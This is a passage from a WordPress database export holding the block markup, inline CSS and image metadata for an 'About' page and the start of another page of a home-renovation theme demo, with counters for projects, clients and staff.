2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"c1e01025-8987-4675-a6e5-4a3cf2941fd2\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"beb68878-1402-4107-acd3-d5a486895047\"} -->\n<style type=\"text/css\"> .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-beb68878-1402-4107-acd3-d5a486895047\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"f7a1e999-5872-4947-8a20-bc38912cc378\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"cd271725-0510-4bf4-aee6-07667f30d332\"} -->\n<style type=\"text/css\"> .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd271725-0510-4bf4-aee6-07667f30d332\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"a21e93c2-c946-4524-8ce5-bb6505444fbc\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','About','','publish','closed','closed','','about','','','2022-08-22 00:25:39','2022-08-22 00:25:39','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=154',0,'page','',0),(339,1,'2021-05-27 05:10:37','2021-05-27 05:10:37','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"64ec1679-1999-47ef-97b2-c5e75287bc99\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-64ec1679-1999-47ef-97b2-c5e75287bc99 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-64ec1679-1999-47ef-97b2-c5e75287bc99.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-64ec1679-1999-47ef-97b2-c5e75287bc99.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-64ec1679-1999-47ef-97b2-c5e75287bc99 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-64ec1679-1999-47ef-97b2-c5e75287bc99.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f55ba5b9-42b3-4ff0-9a0a-564a1640e0af\"} -->\n<style type=\"text/css\"> .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3bc99896-2b5b-42fe-afa6-971674d2cb49\"} -->\n<style type=\"text/css\"> .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 